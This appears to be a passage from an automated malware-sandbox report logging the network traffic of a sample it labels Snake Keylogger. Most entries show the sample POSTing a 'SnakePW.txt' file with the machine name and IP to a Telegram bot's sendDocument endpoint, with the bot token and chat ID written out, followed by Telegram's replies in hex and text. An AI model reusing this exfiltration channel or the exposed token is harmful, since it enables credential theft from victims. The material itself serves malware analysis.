                            Date: Sun, 26 Jun 2022 07:34:42 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:42 UTC487INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 37 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 38 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":67075,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228882,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            289192.168.2.550223149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:42 UTC488OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5757198a1331
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:42 UTC488OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 39 38 61 31 33 33 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5757198a1331Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:42 UTC488INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:42 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:42 UTC489INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 37 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 38 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":67076,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228882,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            29192.168.2.549798149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:32:50 UTC48OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756db6275f7
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:32:50 UTC49OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 64 62 36 32 37 35 66 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756db6275f7Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:32:50 UTC49INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:32:50 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:32:50 UTC50INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 37 37 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 37 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66776,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228770,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            290192.168.2.550224149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:42 UTC489OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da575719c5ae32
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:42 UTC490OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 39 63 35 61 65 33 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da575719c5ae32Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:43 UTC490INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:43 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:43 UTC490INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 37 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 38 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":67077,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228883,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            291192.168.2.550225149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:43 UTC491OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da57571a014885
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:43 UTC491OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 61 30 31 34 38 38 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da57571a014885Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:43 UTC492INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:43 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:43 UTC492INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 37 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 38 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":67078,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228883,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            292192.168.2.550226149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:43 UTC493OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da57571a3ce36e
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:43 UTC493OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 61 33 63 65 33 36 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da57571a3ce36eContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:43 UTC493INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:43 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:43 UTC494INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 37 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 38 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":67079,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228883,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            293192.168.2.550227149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:44 UTC494OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da57571a787e1f
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:44 UTC495OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 61 37 38 37 65 31 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da57571a787e1fContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:44 UTC495INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:44 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:44 UTC495INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 38 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 38 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":67080,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228884,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            294192.168.2.550228149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:44 UTC496OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da57571ab1b686
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:44 UTC496OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 61 62 31 62 36 38 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da57571ab1b686Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:44 UTC497INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:44 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:44 UTC497INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 38 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 38 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
